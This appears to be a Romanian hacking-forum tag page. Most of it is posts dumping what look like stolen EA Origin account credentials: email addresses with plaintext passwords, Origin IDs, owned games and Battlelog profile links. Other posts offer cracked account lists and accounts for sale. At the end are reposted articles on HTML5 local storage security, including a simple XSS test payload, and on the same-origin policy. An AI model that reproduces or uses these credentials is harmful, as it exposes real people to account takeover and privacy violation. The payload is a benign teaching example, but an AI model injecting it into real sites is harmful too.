Search the Community
Showing results for tags 'origin'.
-
merg aproape toate, si nu va luati dupa ce scrie la fiecare user adica ca ce jocuri sunt, pentru ca asa erau acum ceva vreme, dar azi le-am verificat si au mai cumparat jocuri. Email: juanantonio_decai10@hotmail.com:defensa Origin ID: juankay5 Battlefield 1942™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: i-crut.ru@yandex.ru:1456314563 Origin ID: abc1413071662 BATTLEFIELD 3 ================================ Email: flashray1@gmail.com:djnumba1 Origin ID: xhuterx Plants vs. Zombies_FR™ ================================ Email: vel92@mail.ru:akella92 Origin ID: XxSgt_RaMYxX BATTLEFIELD 3 BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) mail: choong1990@gmail.com:solid001 Origin ID: siewchoong Plants vs. Zombies_FR™ ================================ Email: snipa82@web.de:hacker82 Origin ID: ergregi SPORE™ ================================ Email: guitellis@hotmail.com:gt831991 Origin ID: guitellis700 Dead Space ================================ Email: emokiztah21@yahoo.com:09156913533 Origin ID: XaireZero SimCity 2000™ Special Edition Battlefield 3™ Dragon Age™: Origins ================================ Email: sparket98@mail.ru:loditech Origin ID: Evgengoal Plants vs. Zombies_FR™ ================================ Email: vkalf@xs4all.nl:opa123 Origin ID: t2krambo Bejeweled® 3 Battlefield 3™ ================================ Email: mje0704@yahoo.com:se8484se Origin ID: Andus3553 The Sims™ 3 ================================ Email: aklotam@hotmail.com:22calNuke Origin ID: AKLOTAM SimCity™ ================================ Email: jaxon3880@comcast.net:muffin Origin ID: Jaxon3880 Battlefield 2142™: Northern Strike ================================ Email: rhett.raleigh@gmail.com:honda70 Origin ID: rhett9995 SPORE™ The Sims™ 3 ================================ Email: nadie0212@hotmail.com:muc2fus2 Origin ID: nadie0212 Dead Space SIMCITY ORIGIN FREE TRIAL RUPLHU FIFA Soccer 13 Demo SimCity 2000™ Special Edition Crusader: No Remorse BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ ================================ Email: tempesillest@yahoo.com:glucose1 Origin ID: Warhungry11 Battlefield 1942™ ================================ Email: al42beast@yahoo.com:drakeisabeast Origin ID: imarawwboy Battlefield 1942™ Bejeweled® 3 Dead Space ================================ Email: j.keuseman@gmail.com:da3mon Origin ID: keusej The Sims™ 3 World Adventures Expansion Pack Dead Space ================================ Email: matt.ryan.williams@gmail.com:deathstar Origin ID: guytoronto Plants vs. Zombies_FR™ ================================ Email: apocalyps3140@hotmail.fr:Angels03 Origin ID: Dreaws03 STAR WARS(TM): The Old Republic(TM) Digital Standard Edition ================================ Email: capaldi_96@live.se:Sevenof9 Origin ID: ponziSTAR72 Need for Speed World SimCity 2000™ Special Edition BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) STAR WARS(TM): The Old Republic(TM) Digital Standard Edition ================================ Email: mistertackle@gmail.com:porter01 Origin ID: MisterTackle SimCity™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: hornybeast01@gmail.com:daniel Origin ID: kuridza SimCity 2000™ Special Edition BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ ================================ Email: dusan@klbecko.sk:6566842 Origin ID: abc152887337 ================================ Email: akelefear@yahoo.com:bobcats1 Origin ID: abc1253145711 The Sims™ 3 ================================ Email: aimanoraby@ymail.com:2021977 Origin ID: abc82820387 ================================ Email: hellforcers@mail.ru:21406779 Origin ID: hellforcers Dead Space Crysis® 3 MP Open Beta ================================ Email: milla_soo_sweet@hotmail.com:123kalleanka Origin ID: abc1174923519 ================================ Email: johnxbernardo@gmail.com:hardcore Origin ID: selkies24 Battlefield 1942™ ================================ Email: migl.cordeiro@gmail.com:Blat1apaal Origin ID: Trebaruna SimCity 2000™ Special Edition Mass Effect™ 3 Demo Bejeweled® 3 CrossFire (EU) ================================ Email: miz_kitten@hotmail.com:J10123 Origin ID: komap192837461 The Sims™ 3 ================================ Email: pogranecc@ya.ru:ooFmMj6Q Origin ID: volchenkoff Need for Speed World BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: tajsagay@gmail.com:jameel Origin ID: patpat01 Need for Speed World ================================ Email: j_hesselink@hotmail.com:Jasper13 Origin ID: JasperH Battlefield 1942™ SimCity™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) The 100% Electric Nissan Leaf® ================================ Email: tomasiuxs13@gmail.com:masina Origin ID: tomasiuxs BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Wing Commander 3™: Heart of the Tiger™ Battlefield 3™ ================================ Email: minddestroyer13@hotmail.com:killthem1 Origin ID: MadRue Kingdoms of Amalur: Reckoning™ Battlefield 2: Euro Force™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 2: Armored Fury™ ================================ Email: hcroxall@comcast.net:mustang02 Origin ID: Ronar288 The Sims™ 3 Battlefield 2142™: Northern Strike SPORE™ Creature Creator (PC Download) ================================ Email: tomskultety@gmx.de:Purzel123 Origin ID: Grischnach Need for Speed World SimCity 2000™ Special Edition Plants vs. Zombies_FR™ ================================ Email: d4be4st@gmail.com:spell1fire Origin ID: IBeastI Battlefield 3™ ================================ Email: jordi.duque.gonzalez@gmail.com:78827882c Origin ID: Valedeacuerdo ================================ Email: zzkzz@inbox.lv:ruslan4ik Origin ID: abc1318072543 BATTLEFIELD 3 ================================ Email: j0nathan@atlas.cz:mobius Origin ID: j0nathanek FIFA Soccer 13 Demo ================================ Email: tdd420187@aol.com:suzuki Origin ID: Rm125 Battlefield 2142™ Deluxe ================================ Email: ponomarenko35110@gmail.com:eckadele Origin ID: DartWadher35 BATTLEFIELD 3 Plants vs. Zombies_FR™ ================================ Email: kwnj6@yahoo.it:211281 Origin ID: bauscia194 SPORE™ ================================ Email: lopatin19941994@mail.ru:gera19101994 Origin ID: 1910199419101994 Need for Speed World SimCity 2000™ Special Edition BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: uwe@xbox360freaks.de:psp303 Origin ID: Uwe303 Need for Speed World ================================ Email: itsmateoo@aol.com:mateo123 Origin ID: 5Stardynasty Dead Space ================================ Email: robrtlee@gmail.com:billy1 Origin ID: gizmoed1125 Battlefield 2™: Complete Collection ================================ Email: artemkostromitin@gmail.com:chicoo Origin ID: abc1837106814 Plants vs. Zombies_FR™ ================================ Email: mireillehoekzema@hotmail.com:olivier Origin ID: abc416229256 The Sims™ 3 ================================ Email: mkone33@gmail.com:getout Origin ID: abc1754226200 The Sims™ 2 Store Edition ================================ Email: xiaozhu2001@hotmail.com:aa851031 Origin ID: gregormackisnel Battlefield 2142™: Northern Strike ================================ Email: pablo_gattinho@hotmail.com:322550PP Origin ID: xTxFuryxTx Kingdoms of Amalur: Reckoning™ ================================ Email: mirko.reich@gmx.de:dackel Origin ID: Player_2o0o5e38 ================================ Email: raiduxd2@gmail.com:b425004 Origin ID: raiduxd2 Alice: Madness Returns™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Bejeweled® 3 Battlefield 3™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: andrev07@rambler.ru:124124a Origin ID: abc894492020 Dead Space ================================ Email: alexander.sailer@gmail.com:M4sterlol Origin ID: D4rkwalker STAR WARS(TM): The Old Republic(TM) Standard Edition Pre-Order The Sims™ 3 Late Night Expansion Pack BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) STAR WARS(TM): The Old Republic(TM) Digital Standard Edition The Sims™ 3 The Sims™ 3 High-End Loft Stuff ================================ Email: peter.murray159@gmail.com:thrill Origin ID: ghostoffish Battlefield 3™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: tom.shim@gmail.com:70171713 Origin ID: spamlite Battlefield 1942™ ================================ Email: lotus254@gmail.com:04041995 Origin ID: Lefgrif The Sims™ 2 Ultimate Collection Plants vs. Zombies_FR™ Wing Commander 3™: Heart of the Tiger™ Bejeweled® 3 Battlefield 3™ Battlefield 3™ Beta ================================ Email: coolik08@rambler.ru:6vam6pire6 Origin ID: abc206506100 Kingdoms of Amalur: Reckoning™ FIFA MANAGER 13 DEMO SIMCITY ORIGIN FREE TRIAL RUPLHU Need for Speed World FIFA Soccer 13 Demo Mass Effect™ 3 Demo Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: dexs12@hotmail.com:destructor Origin ID: dexs12 FIFA 10 ================================ Email: runningfox10@optimum.net:shopping Origin ID: runningfox10 Dead Space Need for Speed World Plants vs. Zombies_FR™ Mass Effect™ 3 Demo Battlefield 3™ Battlefield 3™ Beta ================================ Email: ccmzittel4@aol.com:snowman4 Origin ID: xxMaryRosexx15 The Sims™ 3 The Sims™ 2 Store Edition ================================ Email: el.lukee@hotmail.com:ehhmichi Origin ID: abc1700180457 Need for Speed World Battlefield 1942™ ================================ Email: wawkelle@hotmail.com:exorbitant Origin ID: abc1364527716 Kingdoms of Amalur: Reckoning™ Battlefield 2: Euro Force™ Battlefield 2: Armored Fury™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: konstanti.kostik@mail.ru:222accs3351 Origin ID: konstanti_kostik FIFA World ================================ Email: c.kitajima@web.de:Michel007 Origin ID: MiEtZeCuTzE BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ The Sims™ 3 Teaser ================================ Email: brian559@gmail.com:ditto6991 Origin ID: brian575 2010 DR PEPPER EA GAMES EVERY BOTTLE/CUP WINS PROMOTION - NOT FOR EA STORE USE Mass Effect™ 3 Demo ================================ Email: umjs78@hotmail.com:djackd Origin ID: umjs78 Mass Effect™ 3 Demo Titanfall™ ================================ Email: konvert.sk.y@gmail.com:Oziris512 Origin ID: InterSux Need for Speed World Battlefield 1942™ SimCity 2000™ Special Edition Crusader: No Remorse Crysis® 3 MP Open Beta BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: dopi_evil_genius@gmx.de:bier23 Origin ID: EviLG23 Need for Speed World ================================ Email: tanktank1010@mail.ru:aa808aa Origin ID: abc1871488106 Plants vs. Zombies_FR™ ================================ Email: jimklingel@gmail.com:gas1985 Origin ID: abc1781951356 Hellgate™: London Warhammer® Online: Age of Reckoning™ + 30-day Game Time™ Card ================================ Email: re-al78@yandex.ru:050269 Origin ID: abc1548518453 BATTLEFIELD 3 Need for Speed World SimCity 2000™ Special Edition BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: mmcrae@whyte-hall.com:mattmc Origin ID: abc335361790 Tiger Woods PGA TOUR® 08 ================================ Email: mirko90_2@libero.it:mirkolicata Origin ID: furia90 ================================ Email: stijn.preuveneers@gmail.com:Tennis88 Origin ID: KameRadsky Battlefield 1942™ ================================ Email: commando137@hotmail.com:Daniel12 Origin ID: Dee-N-Aye Kingdoms of Amalur: Reckoning™ Battlefield 1942™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: haywhy2u@yahoo.com:shevchenko Origin ID: abc1340071110 ================================ Email: gspbirel56@live.com:security2929 Origin ID: GSPbirel56 Kingdoms of Amalur: Reckoning™ Battlefield: Bad Company™ 2 SimCity 2000™ Special Edition Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ ================================ Email: jody.boer@gmail.com:w4sd9P09 Origin ID: ametisjody Crusader: No Remorse BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) STAR WARS(TM): The Old Republic(TM) Digital Standard Edition BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: mc_limatin@mail.ru:Kosilla995hss469 Origin ID: KANFENTANT SimCity 2000™ Special Edition Crusader: No Remorse Bejeweled® 3 Dead Space(TM) Dragon Age™: Origins BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: peter.murray159@gmail.com:thrill Origin ID: ghostoffish Battlefield 3™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: titilopeah@yahoo.com:faster Origin ID: donyatcfc ================================ Email: melani_c_2005@mail.ru:3377733uyf Origin ID: MelaniKroft Need for Speed World SimCity 2000™ Special Edition ================================ Email: Jehnnyfer_jahnny@hotmail.com:jehnnyfer11 Origin ID: abc1032132447 The Sims™ 3 Outdoor Living Stuff The Sims™ 3 Teaser ================================ Email: raffavcba@gmail.com:ragnamark Origin ID: rafavcba Battlefield 1942™ ================================ Email: slotwinskiszymon@gmail.com:skrzyszow Origin ID: Szymeek92 Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: aidy.hilton@live.co.uk:1qw23er4 Origin ID: ad2000780 ================================ Email: colt.98@bk.ru:Xatlant9 Origin ID: Xzenit9 Battlefield 1942™ ================================ Email: haleekias@gmail.com:danielle1 Origin ID: Venom231 Kingdoms of Amalur: Reckoning™ Need for Speed World Alice: Madness Returns™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ Beta ================================ Email: mattbroughton@gmail.com:tlcf0l3y Origin ID: Mallrat21 Kingdoms of Amalur: Reckoning™ Battlefield 1942™ Crusader: No Remorse BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: hornybeast01@gmail.com:daniel Origin ID: kuridza SimCity 2000™ Special Edition BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ ================================ Email: ahmetmihcaaydin@gmail.com:132132 Origin ID: lexor1453 ================================ Email: light_yong@naver.com:n51240 Origin ID: abc873642072 Battlefield 3™ ================================ Email: pogranecc@ya.ru:ooFmMj6Q Origin ID: volchenkoff Need for Speed World BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: minipipe@live.com:pipe14 Origin ID: Mardonnna SimCity 2000™ Special Edition ================================ Email: rajmund.wysocki@gmail.com:baksia2 Origin ID: Retrypl SimCity 2000™ Special Edition Battlefield 3™ ================================ Email: tool@japan.com:bgh413 Origin ID: Velsh SPORE™ SPORE™ Creature Creator (PC Download) ================================ Email: nikkiryan2010@gmail.com:astra99 Origin ID: toosimister The Sims™ 3 Showtime Limited Edition The Sims™ 3 Town Life Stuff ================================ Email: bargaw2@gmail.com:12pimpus Origin ID: Bargh BATTLEFIELD 3 Crusader: No Remorse Mass Effect™ 3 Demo The Sims™ 3 Teaser Dragon Age™: Origins Kingdoms of Amalur: Reckoning™ FIFA MANAGER 13 DEMO Need for Speed World FIFA Soccer 13 Demo BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield: Bad Company™ 2 Digital Deluxe Edition Battlefield 3™ Beta ================================ Email: ivanstrelok666@yandex.ru:anyaklimenko Origin ID: 666StaRyI666 FIFA Soccer 13 Demo Battlefield 1942™ ================================ Email: gabi148@gmail.com:u1s2a377 Origin ID: gabimx Battlefield 1942™ SimCity 2000™ Special Edition ================================ Email: schurke66@gmx.at:JG80785598 Origin ID: hotandcool66 Wing Commander 3™: Heart of the Tiger™ SimCity™ ================================ Email: pedrodagama@ig.com.br:26535167 Origin ID: LovacNTC Need for Speed World Battlefield 3™ ================================ Email: keri9nu4@mail.ru:nokia6120 Origin ID: nikan3232 ================================ Email: coldradio@gmail.com:auggie Origin ID: coldradio SPORE™ ================================ Email: slog-pol@mail.ru:Wq6qs9aM Origin ID: abc911651129 Need for Speed World ================================ Email: milz@frontberlin.de:buky49 Origin ID: fb-milz Battlefield 2: Euro Force™ SIMCITY ORIGIN FREE TRIAL WW ================================ Email: isaac@fiatvisual.com:lavaca Origin ID: isaacw Need for Speed World Battlefield 2142™: Northern Strike ================================ Email: alexanderast71@hotmail.com:musmatta Origin ID: Loyfdnyrd Battlefield 1942™ ================================ Email: kondi234@o2.pl:2q9dwscg Origin ID: Filecix Need for Speed World Battlefield 3™ ================================ Email: neforlike@mail.ru:montana Origin ID: abc578408671 ================================ Email: benodida@ymail.com:ekaninjor Origin ID: abc1321158480 ================================ Email: mikail1399@hotmail.de:dasding13 Origin ID: abc31946599 SimCity 2000™ Special Edition Wing Commander 3™: Heart of the Tiger™ Battlefield 3™ ================================ Email: milkracer@charter.net:Bobbyc38 Origin ID: abc64577191 Stronghold 3 Gold ================================ Email: geraldine.steiner@bluewin.ch:Gaston77 Origin ID: GeraldineSteiner SimCity™ ================================ Email: mkmegane@gmail.com:Kozlu132 Origin ID: abc1656159669 ================================ Email: skoylis@hotmail.gr:6949188563 Origin ID: SkOyLiS Need for Speed World ================================ Email: neil.lamont@lemmuk.com:Celtic1888 Origin ID: TheLemster Battlefield 2142™ Deluxe Battlefield 2: Euro Force™ ================================ Email: zak1994@cox.net:1234zxcv Origin ID: abc125651356 SPORE™ Creature Creator (PC Download) ================================ Email: mityacolosow@mail.ru:kodi89134245475 Origin ID: Player_q8wpa8f9 ================================ Email: rodion.gamaley@web.de:a79dz23y5 Origin ID: Rodagy SimCity 2000™ Special Edition Crusader: No Remorse Battlefield 3™ The Sims™ 2 Ultimate Collection Kingdoms of Amalur: Reckoning™ SIMCITY ORIGIN FREE TRIAL WW Need for Speed World Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: korabel1@gmail.com:s669xy Origin ID: korabelnik Kingdoms of Amalur: Reckoning™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 2142™: Northern Strike ================================ Email: raffavcba@gmail.com:ragnamark Origin ID: rafavcba Battlefield 1942™ ================================ Email: samuelcunhajr@gmail.com:trunksssj3 Origin ID: Ninrode SPORE™ ================================ Email: urby2@centrum.cz:100000 Origin ID: Urbyy2 BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ ================================ Email: globblepop@hotmail.com:plobblegop09 Origin ID: globblepop Battlefield: Bad Company™ 2 SimCity 2000™ Special Edition Battlefield 3™ Beta ================================ Email: mizz_smarts@hotmail.com:pingpong Origin ID: beth3592 ================================ Email: nesteroff94@gmail.com:66110Gud Origin ID: Elvn731 BATTLEFIELD 3 ================================ Email: bugsy@coalescemusic.co.nz:suna69 Origin ID: bugsydfx Battlefield: Bad Company™ 2 ================================ Email: mizuro91@mail.ru:tska36982 Origin ID: m1zum1zu BATTLEFIELD 3 Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: stefanzbiljic@hotmail.com:agfafa23 Origin ID: Sorumin Battlefield 3™ ================================ Email: danilenko.dn@gmail.com:4762463 Origin ID: fat763 Dead Space ================================ Email: dominikrynkevic@gmail.com:calcium123 Origin ID: abc2051177297 Plants vs. Zombies_FR™ BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: akmanmuhittin@gmail.com:m1231907f Origin ID: akaman74 ================================ Email: minig2552@gmail.com:boo100396 Origin ID: abc1920970745 The Sims™ 3 ================================ Email: bbtareya@gmail.com:Ebanutost77 Origin ID: Snoothie BATTLEFIELD 3 SimCity 2000™ Special Edition ================================ Email: minishe_1@hotmail.com:clarinet Origin ID: abc96380882 The Sims™ 2 Ultimate Collection The Sims™ 2 FreeTime ================================ Email: t4ssin@gmail.com:la7eme Origin ID: Ch4udard FIFA MANAGER 13 DEMO Kingdoms of Amalur: Reckoning™ SIMCITY ORIGIN FREE TRIAL RUPLHU FIFA Soccer 13 Demo Need for Speed World Battlefield 1942™ Mass Effect™ 3 Demo BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) ================================ Email: pokemon_wizkid@hotmail.com:1475369a Origin ID: Nsc007 Battlefield 2142™: Northern Strike ================================ Email: rickkeeris@live.nl:presario Origin ID: Keeris Need for Speed World ================================ Email: mkane10@hotmail.com:mikey046 Origin ID: mkane101 Mass Effect™ 3 Demo ================================ Email: nmraymond@gmail.com:mesack87 Origin ID: NMarieR Alice: Madness Returns™ ================================ Email: pablos25@o2.pl:lipa23 Origin ID: pablos255 Battlefield 1942™ ================================ Email: holzerdominik@gmx.at:hol2ha35 Origin ID: HoiiZa BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ Dead Space ================================ Email: cris7ianf@hotmail.com:Leaveme1 Origin ID: cfex17 Need for Speed World ================================ Email: julie.doherty@hotmail.fr:juju0071286 Origin ID: abc1062994590 The Sims™ 3 ================================ Email: orbix1000@hotmail.de:silber99 Origin ID: DovnenKO1 Burnout™ Paradise The Ultimate Box Plants vs. Zombies_FR™ Battlefield 3™ ================================ Email: gjfg_4@hotmail.com:lisboa Origin ID: Gon921 The Sims™ 2 Ultimate Collection Need for Speed World Battlefield 3™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ================================ Email: r99t9r@gmail.com:nur1worT Origin ID: RUU7 Battlefield 2: Euro Force™ FIFA Soccer 13 Demo BATTLEFIELD 4 (ORIGIN - RU ONLY FREE TRIAL) Battlefield 3™ Beta Dead Space ================================ Email: dimaseee@gmail.com:6256222dimas2 Origin ID: dimasik5251 Plants vs. Zombies_FR™ ================================ Email: aisha.gaines@gmail.com:musical2 Origin ID: aishabear1997 The Sims™ 3 ================================ Email: mitch_kalf@hotmail.com:mitkal Origin ID: bubblehead Battlefield 1942™ ================================ Email: robin_blakely1958@yahoo.com:6394rb Origin ID: abc1721801487 ================================ Email: remco-wr@hotmail.com:godverdome Origin ID: Balzak2000 Battlefield: Bad Company™ 2 Battlefield 3™ Beta
- 10 replies
-
- battlefield
-
(and 3 more)
Tagged with:
-
Email: pmcanespie22@gmail.com:oblivion72 Origin ID: abc1334172750 Battlefield: Bad Company™ 2 ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/abc1334172750 Rank: 1 DLC: No DLC ================================ Email: zunwoo.virat@gmail.com:090517673g Origin ID: abc1428819255 Dead Space ================================ Email: feudji@gmail.com:azedc14789 Origin ID: Rapace14 Medal of Honor™ BATTLEFIELD 4 (ORIGIN FREE TRIAL) ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/Rapace14 Rank: 0 DLC: Close Quaters ================================ Email: dpsdag@hotmail.com:daazone Origin ID: abc901362743 SPORE™ ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/abc901362743 Rank: 61 DLC: No DLC ================================ Email: ph.vischer@hotmail.com:ph19vi94 Origin ID: philip228 Battlefield: Bad Company™ 2 Battlefield 3™ Beta ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/philip228 Rank: 47 DLC: ================================ Email: michalkud@gmail.com:nezadane Origin ID: Trinkorn Burnout™ Paradise The Ultimate Box Dead Space™ 3 Command & Conquer™ Red Alert™ 3: Uprising Battlefield 3™ ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/Trinkorn Rank: 3 DLC: No DLC ================================ Email: tetsuo340@hotmail.com:porculero1 Origin ID: Khelton Need for Speed™ Hot Pursuit ================================ Email: suzuki410@hotmail.com:22612712beer Origin ID: JohnnyBear Battlefield: Bad Company™ 2 ================================ Email: enriab93_@hotmail.com:helloween1 Origin ID: Dazedx_X Need for Speed World ================================ Email: danielgon71@hotmail.com:hulala Origin ID: abc1919942572 Medal of Honor™ Limited Edition ================================ Email: nigelbright164@gmail.com:leociaralexi Origin ID: oldgamer12345 Dragon Age™: Origins - Ultimate Edition SimCity 2000™ Special Edition ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/oldgamer12345 Rank: 0 DLC: ================================ Email: eoscondor@gmail.com:r247sk1n Origin ID: wufggjv6 SPORE™ SPORE™ Creepy & Cute Parts Pack Spore Galactic Adventures Alice: Madness Returns™ ================================ Email: ramo-er-hot95@hotmail.com:mehmed2 Origin ID: Mrbosnier FIFA Soccer 11 ================================ Email: vanessajacob727@hotmail.com:caramel Origin ID: Vanesss727 Bejeweled® 3 Dragon Age™: Origins ================================ Email: aurely.alera@gmail.com:bouddha784 Origin ID: Alera784 The Sims™ 3 Generations The Sims™ 3 The Sims™ 3 Late Night Expansion Pack SimCity 4 Deluxe Edition The Sims™ 3 Ambitions The Sims™ 3 World Adventures Expansion Pack The Sims™ 3 Pets ================================ Email: furryrobert@gmail.com:cathunter Origin ID: ArrowUnleashed Battlefield 1942™ ================================ Email: juzu2000@gmail.com:joona123 Origin ID: juszu123 Battlefield 1942™ The Sims™ 3 Teaser ************Battlelog************* Link: http://battlelog.battlefield.com/bf3/ru/user/juszu123 Rank: 16 DLC: No DLC
- 12 replies
-
- battlefield
- dlc
-
(and 3 more)
Tagged with:
-
Salut...Aveti aici conturi origin gratis , deabia crack-uite.O sa va pun link pe zippyshare ca e lung lista si sa puteti descarca lista intr-un text document.Da-ti like pentru mai multe posturi de genu ..Peace! Linkul:Zippyshare.com - Conturi Origin.txt
-
Salut...Sunt nou pe aici , insa am experienta in cracking ,SQL,hacking ,etc.Primul meu post , sper sa va placa , o sa fie multe altele .O sa pun link-ul ca sa puteti descarca conturile intr-un text document ca sunt multe si nu vreau sa lungesc post-ul. Link-ul:http://www14.zippyshare.com/v/ItI9vfET/file.html
-
- experienta
- gratis
-
(and 3 more)
Tagged with:
-
Deci am facut un mic pachet de vanzare.. pachetul contine 50 de conturi gta5-gta4 -> login E-mail : pass ............................................................ Pe langa astea 50 adaug inca 30 de conturi de origin, pm!
-
In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security. Local Storage Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 by using the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name value pairs. The data processed using the localStorage object persists through browser shutdowns, while data created using the sessionStorage object will be cleared after the current browsing session. One important point to note is, this storage is origin-specific. This means that a site from a different origin cannot access the data stored in an application’s local database. Let me make it clear with a simple example. Below is a sample HTML5 application, which is capable of storing data using the local storage feature. We can also retrieve the data stored in the database using the “Show Data” button. Let us first observe the origin of this site. Let us assume that this is “Application A”. http://localhost:8383/ So here are the details: Name: Application A Origin: http://localhost:8383/ Let us click the Show Data button. We are able to access the data stored by this application in the database. That is expected. Now, let us try to access this data stored by application A from a different origin. Let us assume that this is Application B Here are the details: Name: Application B Origin: http://localhost/ Please note that the port number is different from Application A. Let us click the “Show Data” button. When I clicked “Show Data”, there seems to be nothing displayed on the web page. This is because this application is running on a different origin. Just to confirm, let us run a different application named “Application C” from the same origin as “Application A”. Here are the details. Name: Application C Origin: http://localhost:8383/ Let us click “Show Data” and observe the result. Nice! We are able to access the data from this application, since it is from the same origin as Application A. To conclude, I have used the same code in all the above examples but with different origins. We inserted data into the database using Application A. When we tried accessing it from Application B, it failed due to the same origin policy. Let us now see some attacks possible with HTML5 local storage. Storing Sensitive Data Developers may store sensitive information in these databases. It is possible to find API keys or similar sensitive data when working with APIs due to their statelessness. We can exploit them using an XSS vulnerability if there is no physical access to the device. Below is an example of how JavaScript’s localStorage object stores data. We can use the function setItem with some name-value pairs as parameters. localStorage.setItem(“data”, “mydata”); As we can see in the figure below, Chrome stores this data in the following path. We can programmatically read this data using JavaScript as shown below. localStorage.getItem(“data”); We can now go ahead and read this data from the SQLite database as shown below. Script Injection SQLite data, when not properly sanitized, may lead to script injection attacks. Let us see a simple example. Below is the same form we saw in the beginning of the article. Let us store some sample data and retrieve it back as shown below. If this data is not properly sanitized, it will lead to stored XSS Vulnerability as shown below. This time, let us enter the below piece of code into the message box. <img src=’X’ onerror=alert(1);> et us click the “Show Data” button and see the result. As we can see, it has popped up an alertbox due to the JavaScript we injected. Conclusion This article has discussed how the HTML5 local storage feature works and how Same Origin Policy restrictions are applied on the data being stored. Finally, we have had a look at some possible attacks on the HTML5 local storage feature. We will see other HTML5 features and possible attacks in later articles. Source
-
- application
- data
-
(and 3 more)
Tagged with:
-
The same origin policy is an important concept in the web application information security domain. In this policy, a web browser allows scripts contained in a first web page ‘A’ to access data/resources in a second web page ‘B’, however, only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page’s DOM (document object model). Let’s consider one example in a physical world scenario. Imagine a school where all students within have a different origin. One class has many students, but all are unrelated. If a guardian makes a request to the school staff for his/her son’s classmate’s progress report, the school staff would deny the same as he/she not authenticated for the same. Similarly, if the school received a request for checking a student’s progress report, first they would ensure the requester is a guardian/parent/close relation of the student before granting student’s details/progress report. This is closely related to the browser with the same origin policy (SOP). Now, imagine a school that allowed access to anyone’s progress report to any guardian from the outside world – that would be like a browser without SOP. The same origin policy mechanism defines a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information. A strict segregation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity. Same origin policy: Is it really important? Assume that you are logged into the Gmail server and visit a malicious website in the same browser, but another tab. Without implementing the same origin policy, an attacker can access your mail and other sensitive information using JavaScript. For example read private mail, send fake mail, read your chats. Also, Gmail uses JavaScript to enhance the user experience and save round trip bandwidth, so it is really so important that the browser can detect that this JavaScript is trusted to access Gmail resources. That’s where the same origin policy comes into the picture. Now imagine the same scenario and replace Gmail with your online banking application – it could be worse. Understand SOP with DOM: Same origin policy weds document object model When we talk about how JavaScript can access DOM policies, we consider the 3 portions of the URL, which are HOST NAME + SCHEME + PORT. If more than one application has the same hostname, scheme and port and is trying to access the DOM data, access will be granted. However, Internet Explorer only validates hostname + scheme before accessing the same. Internet Explorer does not care about PORT. This is traditional scenario which works well when accessing the same with one origin. In 